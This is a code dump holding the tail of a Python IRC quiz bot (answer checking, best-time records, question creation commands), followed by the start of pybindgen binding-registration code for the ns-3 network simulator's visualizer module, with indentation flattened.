'3Congrats 1' + user + ', 3You have correctly answered the question.')
quiz_id = tmp_quiz_data[channel.lower()]['id']
if round(real_time_secs - tmp_quiz_data[chan]["startTime"], 2) < \
quiz_data["questions"][quiz_id]["bestTime"][1]:
time_dif = quiz_data["questions"][quiz_id]["bestTime"][1] - (
real_time_secs - tmp_quiz_data[chan]["startTime"])
quiz_data["questions"][quiz_id]["bestTime"][1] = round(
real_time_secs - tmp_quiz_data[chan]["startTime"], 2)
quiz_data["questions"][quiz_id]["bestTime"][0] = user
irc.send_private_message(channel, user + '3 has just set the new best time of ' + str(
quiz_data["questions"][quiz_id]["bestTime"][
1]) + ' 3secs. ' + user + ' 3beat the old best time by ' + str(
round(time_dif, 2)) + ' 3secs.')
elif quiz_data["questions"][quiz_id]["bestTime"][0] == "":
quiz_data["questions"][quiz_id]["bestTime"][1] = round(
real_time_secs - tmp_quiz_data[chan]["startTime"], 2)
quiz_data["questions"][quiz_id]["bestTime"][0] = user
irc.send_private_message(channel, user + '3 has just set the new best time of ' + str(
quiz_data["questions"][quiz_id]["bestTime"][1]) + ' 3secs.')
quiz_data["questions"][quiz_id]["answeredCorrect"] += 1
save_quiz_database()
del tmp_quiz_data[chan]
else:
quiz_id = tmp_quiz_data[channel.lower()]['id']
irc.send_private_message(channel,
'5Sorry 1' + user + ', 5that is the wrong answer. You cannot attempt anymore for this round.')
tmp_quiz_data[chan]["players"][user.lower()] += 1
quiz_data["questions"][quiz_id]["answeredIncorrect"] += 1
irc.user_info[user.lower()]["quiz"]["incorrect"] += 1
irc.userData[user.lower()]["quiz"]["participated"] += 1
userDatabase.save_user_database(irc)
return
if command[0].lower() == '!quizhelp':
irc.send_private_message(channel,
user + ', basically you get given a multi-choice question and your job is to carefully type in what you think is the right answer before the time runs out and before any other IRC users guess the right answer. You can only guess once, so double check that you are right. So what are you waiting for? start a !quiz.')
elif command[0].lower() == '!quiz':
if len(quiz_data['questions']) == 0:
irc.send_private_message(channel, '5ERROR: No quiz questions in database.')
return
#if len(quiz_data['questions']) in range(0, 10):
# irc.send_private_message(channel,
# '5ERROR: There are only a few quiz questions in database. Until more are added, the quiz will be unavailable.')
# return
if channel in tmp_quiz_data:
return
random_quiz_id = random.randint(0, len(quiz_data['questions']))
# print quizQuestionID
# print "creating tmp data"
tmp_quiz_data[channel] = dict()
tmp_quiz_data[channel]['isActive'] = False
tmp_quiz_data[channel]["numOfPlayers"] = 0
tmp_quiz_data[channel]["players"] = {}
tmp_quiz_data[channel]["timePeriod"] = float(quiz_data['questions'][random_quiz_id]["timePeriod"])
tmp_quiz_data[channel]["rightAnswer"] = quiz_data['questions'][random_quiz_id]['answers'][0].lower()
tmp_quiz_data[channel]["wrongAnswers"] = []
for i in range(1, len(quiz_data['questions'][random_quiz_id]['answers'])):
tmp_quiz_data[channel]["wrongAnswers"].append(quiz_data['questions'][random_quiz_id]['answers'][i].lower())
tmp_quiz_data[channel]["startTime"] = round(time.time(), 1)
tmp_quiz_data[channel]['id'] = random_quiz_id
# print "creating tmp data (part 2)"
quiz_answers = quiz_data['questions'][random_quiz_id]['answers']
quiz_answers = sorted(quiz_answers, key=lambda k: random.random())
tmp_quiz_data[channel.lower()]['isActive'] = True
irc.send_private_message(channel, '6Question: "' + str(
quiz_data['questions'][random_quiz_id]["question"]) + '" 6Answers: ' + str(quiz_answers).strip(
'[]') + '.')
if quiz_data['questions'][random_quiz_id]["bestTime"][0] != "":
irc.send_private_message(channel,
'\u00036Best time set by\u0003 {0} \u00036in\u0003 {1} \u00036secs.'.format(
str(quiz_data['questions'][random_quiz_id]["bestTime"][0]),
str(quiz_data['questions'][random_quiz_id]["bestTime"][1])))
elif command[0].lower() == '!numberofquizquestions':
irc.send_private_message(channel,
"There are " + str(len(quiz_data['questions'])) + " questions in the Quiz database.")
elif command[0].lower() == '!createquizquestion' or command[0].lower() == '!cqq':
if irc.user_info[user.lower()]["access_level"] >= 1:
question_re = re.compile("!c(?:(?:reate)?)q(?:(?:uiz)?)q(?:(?:uestion)?)\s(.*\?)\s([0-9]+[0-9]?)\s(.*)",
re.IGNORECASE)
match = question_re.match(message)
if match:
command_params = question_re.findall(message)[0]
print(command_params)
question = command_params[0]
time_period = command_params[1]
answer_str = command_params[2]
if re.match('"([\w\s]*)"', answer_str):
answers = re.findall('"([\w\s]*)"', answer_str)
else:
irc.send_private_message(channel, "USAGE: !c[reate]q[uiz]q[uestion] (Question)? "
"(Question Time Period (in Secs)) \"(Correct Answer)\" "
"\"(Wrong Answer)\" [\"(Wrong Answer)\" \"(...)\"]")
irc.send_private_message(channel, "EXAMPLE: !cqq 1 + 1 = ? 2 1 3 4 5")
return
if int(time_period) < 5 or int(time_period) > 60:
irc.send_private_message(channel,
'5ERROR: The time period is not pratical. Set a more appropriate time period (between 5 - 60 seconds).')
return
for question_data in quiz_data['questions']:
if question_data['question'].lower() == question.lower():
irc.send_private_message(channel, '5ERROR: The question has already been created.')
return
question_data = {"question": question,
"answers": [],
"bestTime": ["", 0.0],
"answeredCorrect": 0,
"answeredIncorrect": 0,
"answeredCorrectMessage": "",
"showAnswers": True,
"timePeriod": float(time_period),
"creator": user,
"createdTime": time.time()
}
for i in range(0, len(answers)):
question_data['answers'].append(answers[i])
quiz_data['questions'].append(question_data)
save_quiz_database()
irc.send_private_message(channel, '3SUCCESS: Quiz Question, "' + question + '" (ID: ' + str(
len(quiz_data['questions']) - 1) + ') has been added into the quiz database.')
else:
irc.send_private_message(channel, "USAGE: !c[reate]q[uiz]q[uestion] (Question)? "
"(Question Time Period (in Secs)) \"(Correct Answer)\" "
"\"(Wrong Answer)\" [\"(Wrong Answer)\" \"(...)\"]")
irc.send_private_message(channel, "EXAMPLE: !cqq 1 + 1 = ? 2 1 3 4 5") | unknown | codeparrot/codeparrot-clean | ||
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.visualizer', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## address.h (module 'network'): ns3::Address [class]
module.add_class('Address', import_from_module='ns.network')
## address.h (module 'network'): ns3::Address::MaxSize_e [enumeration]
module.add_enum('MaxSize_e', ['MAX_SIZE'], outer_class=root_module['ns3::Address'], import_from_module='ns.network')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class]
module.add_class('AttributeConstructionList', import_from_module='ns.core')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct]
module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList'])
## buffer.h (module 'network'): ns3::Buffer [class]
module.add_class('Buffer', import_from_module='ns.network')
## buffer.h (module 'network'): ns3::Buffer::Iterator [class]
module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::Buffer'])
## packet.h (module 'network'): ns3::ByteTagIterator [class]
module.add_class('ByteTagIterator', import_from_module='ns.network')
## packet.h (module 'network'): ns3::ByteTagIterator::Item [class]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagIterator'])
## byte-tag-list.h (module 'network'): ns3::ByteTagList [class]
module.add_class('ByteTagList', import_from_module='ns.network')
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator [class]
module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList'])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item [struct]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList::Iterator'])
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## event-id.h (module 'core'): ns3::EventId [class]
module.add_class('EventId', import_from_module='ns.core')
## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
module.add_class('Ipv4Address', import_from_module='ns.network')
## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
root_module['ns3::Ipv4Address'].implicitly_converts_to(root_module['ns3::Address'])
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress [class]
module.add_class('Ipv4InterfaceAddress', import_from_module='ns.internet')
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e [enumeration]
module.add_enum('InterfaceAddressScope_e', ['HOST', 'LINK', 'GLOBAL'], outer_class=root_module['ns3::Ipv4InterfaceAddress'], import_from_module='ns.internet')
## ipv4-address.h (module 'network'): ns3::Ipv4Mask [class]
module.add_class('Ipv4Mask', import_from_module='ns.network')
## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
module.add_class('Ipv6Address', import_from_module='ns.network')
## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
root_module['ns3::Ipv6Address'].implicitly_converts_to(root_module['ns3::Address'])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix [class]
module.add_class('Ipv6Prefix', import_from_module='ns.network')
## mac48-address.h (module 'network'): ns3::Mac48Address [class]
module.add_class('Mac48Address', import_from_module='ns.network')
## mac48-address.h (module 'network'): ns3::Mac48Address [class]
root_module['ns3::Mac48Address'].implicitly_converts_to(root_module['ns3::Address'])
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## object.h (module 'core'): ns3::ObjectDeleter [struct]
module.add_class('ObjectDeleter', import_from_module='ns.core')
## object-factory.h (module 'core'): ns3::ObjectFactory [class]
module.add_class('ObjectFactory', import_from_module='ns.core')
## packet-metadata.h (module 'network'): ns3::PacketMetadata [class]
module.add_class('PacketMetadata', import_from_module='ns.network')
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [struct]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata'])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [enumeration]
module.add_enum('', ['PAYLOAD', 'HEADER', 'TRAILER'], outer_class=root_module['ns3::PacketMetadata::Item'], import_from_module='ns.network')
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator [class]
module.add_class('ItemIterator', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata'])
## packet.h (module 'network'): ns3::PacketTagIterator [class]
module.add_class('PacketTagIterator', import_from_module='ns.network')
## packet.h (module 'network'): ns3::PacketTagIterator::Item [class]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagIterator'])
## packet-tag-list.h (module 'network'): ns3::PacketTagList [class]
module.add_class('PacketTagList', import_from_module='ns.network')
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData [struct]
module.add_class('TagData', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagList'])
## pyviz.h (module 'visualizer'): ns3::PyViz [class]
module.add_class('PyViz')
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketCaptureMode [enumeration]
module.add_enum('PacketCaptureMode', ['PACKET_CAPTURE_DISABLED', 'PACKET_CAPTURE_FILTER_HEADERS_OR', 'PACKET_CAPTURE_FILTER_HEADERS_AND'], outer_class=root_module['ns3::PyViz'])
## pyviz.h (module 'visualizer'): ns3::PyViz::LastPacketsSample [struct]
module.add_class('LastPacketsSample', outer_class=root_module['ns3::PyViz'])
## pyviz.h (module 'visualizer'): ns3::PyViz::NetDeviceStatistics [struct]
module.add_class('NetDeviceStatistics', outer_class=root_module['ns3::PyViz'])
## pyviz.h (module 'visualizer'): ns3::PyViz::NodeStatistics [struct]
module.add_class('NodeStatistics', outer_class=root_module['ns3::PyViz'])
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketCaptureOptions [struct]
module.add_class('PacketCaptureOptions', outer_class=root_module['ns3::PyViz'])
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketDropSample [struct]
module.add_class('PacketDropSample', outer_class=root_module['ns3::PyViz'])
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketSample [struct]
module.add_class('PacketSample', outer_class=root_module['ns3::PyViz'])
## pyviz.h (module 'visualizer'): ns3::PyViz::RxPacketSample [struct]
module.add_class('RxPacketSample', parent=root_module['ns3::PyViz::PacketSample'], outer_class=root_module['ns3::PyViz'])
## pyviz.h (module 'visualizer'): ns3::PyViz::TransmissionSample [struct]
module.add_class('TransmissionSample', outer_class=root_module['ns3::PyViz'])
## pyviz.h (module 'visualizer'): ns3::PyViz::TxPacketSample [struct]
module.add_class('TxPacketSample', parent=root_module['ns3::PyViz::PacketSample'], outer_class=root_module['ns3::PyViz'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simulator.h (module 'core'): ns3::Simulator [class]
module.add_class('Simulator', destructor_visibility='private', import_from_module='ns.core')
## tag.h (module 'network'): ns3::Tag [class]
module.add_class('Tag', import_from_module='ns.network', parent=root_module['ns3::ObjectBase'])
## tag-buffer.h (module 'network'): ns3::TagBuffer [class]
module.add_class('TagBuffer', import_from_module='ns.network')
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## int64x64-double.h (module 'core'): ns3::int64x64_t [class]
module.add_class('int64x64_t', import_from_module='ns.core')
## chunk.h (module 'network'): ns3::Chunk [class]
module.add_class('Chunk', import_from_module='ns.network', parent=root_module['ns3::ObjectBase'])
## header.h (module 'network'): ns3::Header [class]
module.add_class('Header', import_from_module='ns.network', parent=root_module['ns3::Chunk'])
## ipv4-header.h (module 'internet'): ns3::Ipv4Header [class]
module.add_class('Ipv4Header', import_from_module='ns.internet', parent=root_module['ns3::Header'])
## ipv4-header.h (module 'internet'): ns3::Ipv4Header::DscpType [enumeration]
module.add_enum('DscpType', ['DscpDefault', 'CS1', 'AF11', 'AF12', 'AF13', 'CS2', 'AF21', 'AF22', 'AF23', 'CS3', 'AF31', 'AF32', 'AF33', 'CS4', 'AF41', 'AF42', 'AF43', 'CS5', 'EF', 'CS6', 'CS7'], outer_class=root_module['ns3::Ipv4Header'], import_from_module='ns.internet')
## ipv4-header.h (module 'internet'): ns3::Ipv4Header::EcnType [enumeration]
module.add_enum('EcnType', ['NotECT', 'ECT1', 'ECT0', 'CE'], outer_class=root_module['ns3::Ipv4Header'], import_from_module='ns.internet')
## object.h (module 'core'): ns3::Object [class]
module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
## object.h (module 'core'): ns3::Object::AggregateIterator [class]
module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::EventImpl', 'ns3::empty', 'ns3::DefaultDeleter<ns3::EventImpl>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Ipv4MulticastRoute', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Ipv4MulticastRoute>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Ipv4Route', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Ipv4Route>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::NixVector', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NixVector>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::OutputStreamWrapper', 'ns3::empty', 'ns3::DefaultDeleter<ns3::OutputStreamWrapper>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Packet', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Packet>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## socket.h (module 'network'): ns3::Socket [class]
module.add_class('Socket', import_from_module='ns.network', parent=root_module['ns3::Object'])
## socket.h (module 'network'): ns3::Socket::SocketErrno [enumeration]
module.add_enum('SocketErrno', ['ERROR_NOTERROR', 'ERROR_ISCONN', 'ERROR_NOTCONN', 'ERROR_MSGSIZE', 'ERROR_AGAIN', 'ERROR_SHUTDOWN', 'ERROR_OPNOTSUPP', 'ERROR_AFNOSUPPORT', 'ERROR_INVAL', 'ERROR_BADF', 'ERROR_NOROUTETOHOST', 'ERROR_NODEV', 'ERROR_ADDRNOTAVAIL', 'ERROR_ADDRINUSE', 'SOCKET_ERRNO_LAST'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network')
## socket.h (module 'network'): ns3::Socket::SocketType [enumeration]
module.add_enum('SocketType', ['NS3_SOCK_STREAM', 'NS3_SOCK_SEQPACKET', 'NS3_SOCK_DGRAM', 'NS3_SOCK_RAW'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network')
## socket.h (module 'network'): ns3::SocketAddressTag [class]
module.add_class('SocketAddressTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
## socket.h (module 'network'): ns3::SocketIpTtlTag [class]
module.add_class('SocketIpTtlTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
## socket.h (module 'network'): ns3::SocketSetDontFragmentTag [class]
module.add_class('SocketSetDontFragmentTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
## nstime.h (module 'core'): ns3::Time [class]
module.add_class('Time', import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time::Unit [enumeration]
module.add_enum('Unit', ['S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time [class]
root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t'])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## trailer.h (module 'network'): ns3::Trailer [class]
module.add_class('Trailer', import_from_module='ns.network', parent=root_module['ns3::Chunk'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## channel.h (module 'network'): ns3::Channel [class]
module.add_class('Channel', import_from_module='ns.network', parent=root_module['ns3::Object'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## event-impl.h (module 'core'): ns3::EventImpl [class]
module.add_class('EventImpl', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
## ipv4.h (module 'internet'): ns3::Ipv4 [class]
module.add_class('Ipv4', import_from_module='ns.internet', parent=root_module['ns3::Object'])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker [class]
module.add_class('Ipv4AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue [class]
module.add_class('Ipv4AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol [class]
module.add_class('Ipv4L3Protocol', import_from_module='ns.internet', parent=root_module['ns3::Ipv4'])
## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol::DropReason [enumeration]
module.add_enum('DropReason', ['DROP_TTL_EXPIRED', 'DROP_NO_ROUTE', 'DROP_BAD_CHECKSUM', 'DROP_INTERFACE_DOWN', 'DROP_ROUTE_ERROR', 'DROP_FRAGMENT_TIMEOUT'], outer_class=root_module['ns3::Ipv4L3Protocol'], import_from_module='ns.internet')
## ipv4-l4-protocol.h (module 'internet'): ns3::Ipv4L4Protocol [class]
module.add_class('Ipv4L4Protocol', import_from_module='ns.internet', parent=root_module['ns3::Object'])
## ipv4-l4-protocol.h (module 'internet'): ns3::Ipv4L4Protocol::RxStatus [enumeration]
module.add_enum('RxStatus', ['RX_OK', 'RX_CSUM_FAILED', 'RX_ENDPOINT_CLOSED', 'RX_ENDPOINT_UNREACH'], outer_class=root_module['ns3::Ipv4L4Protocol'], import_from_module='ns.internet')
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker [class]
module.add_class('Ipv4MaskChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue [class]
module.add_class('Ipv4MaskValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute [class]
module.add_class('Ipv4MulticastRoute', import_from_module='ns.internet', parent=root_module['ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >'])
## ipv4-route.h (module 'internet'): ns3::Ipv4Route [class]
module.add_class('Ipv4Route', import_from_module='ns.internet', parent=root_module['ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >'])
## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol [class]
module.add_class('Ipv4RoutingProtocol', import_from_module='ns.internet', parent=root_module['ns3::Object'])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker [class]
module.add_class('Ipv6AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue [class]
module.add_class('Ipv6AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker [class]
module.add_class('Ipv6PrefixChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue [class]
module.add_class('Ipv6PrefixValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## mac48-address.h (module 'network'): ns3::Mac48AddressChecker [class]
module.add_class('Mac48AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## mac48-address.h (module 'network'): ns3::Mac48AddressValue [class]
module.add_class('Mac48AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## net-device.h (module 'network'): ns3::NetDevice [class]
module.add_class('NetDevice', import_from_module='ns.network', parent=root_module['ns3::Object'])
## net-device.h (module 'network'): ns3::NetDevice::PacketType [enumeration]
module.add_enum('PacketType', ['PACKET_HOST', 'NS3_PACKET_HOST', 'PACKET_BROADCAST', 'NS3_PACKET_BROADCAST', 'PACKET_MULTICAST', 'NS3_PACKET_MULTICAST', 'PACKET_OTHERHOST', 'NS3_PACKET_OTHERHOST'], outer_class=root_module['ns3::NetDevice'], import_from_module='ns.network')
## nix-vector.h (module 'network'): ns3::NixVector [class]
module.add_class('NixVector', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
## node.h (module 'network'): ns3::Node [class]
